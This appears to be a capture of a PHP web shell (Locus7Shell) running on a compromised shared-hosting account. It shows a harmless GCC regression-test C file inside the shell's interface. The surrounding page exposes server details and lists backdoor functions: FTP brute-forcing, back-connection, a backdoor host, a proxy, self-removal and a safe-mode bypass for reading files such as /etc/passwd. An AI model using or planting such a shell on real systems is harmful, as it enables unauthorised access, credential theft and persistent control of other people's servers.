Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/tree-ssa/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr105860.c (1.42 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do run } */
/* { dg-options "-O1" } */

struct S1  {
        unsigned int _0;
        unsigned int _1;
} ;
struct S2  {
        struct S1 _s1;
        unsigned long _x2;
} ;

struct ufld_type1  {
        unsigned int _u1t;
        struct S2 _s2;
} ;

struct ufld_type2  {
        unsigned int _u2t;
        struct S1 _s1;
} ;
struct parm_type {
        union {
                struct ufld_type1 var_1;
                struct ufld_type2 var_2;
        } U;
};

struct parm_type  bad_function( struct parm_type arg0 )
{
        struct parm_type rv;
        struct S2 var4;
        switch( arg0.U.var_2._u2t ) {
        case 4294967041:
                var4._s1 = arg0.U.var_1._s2._s1;
                rv.U.var_1._u1t = 4294967041;
                rv.U.var_1._s2 = var4;
                break;
        case 4294967043:
                rv.U.var_2._u2t = 4294967043;
                rv.U.var_2._s1 = arg0.U.var_2._s1;
                break;
        default:
                break;
        }
        return rv;
}

int main() {
        struct parm_type val;
        struct parm_type out;
        val.U.var_2._u2t = 4294967043;
        val.U.var_2._s1._0 = 0x01010101;
        val.U.var_2._s1._1 = 0x02020202;
        out = bad_function(val);
    if (val.U.var_2._u2t != 4294967043)
      __builtin_abort ();
        if (out.U.var_2._s1._0 != 0x01010101)
      __builtin_abort ();
        if (val.U.var_2._s1._1 != 0x02020202 )
      __builtin_abort ();
    return 0;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.005 ]--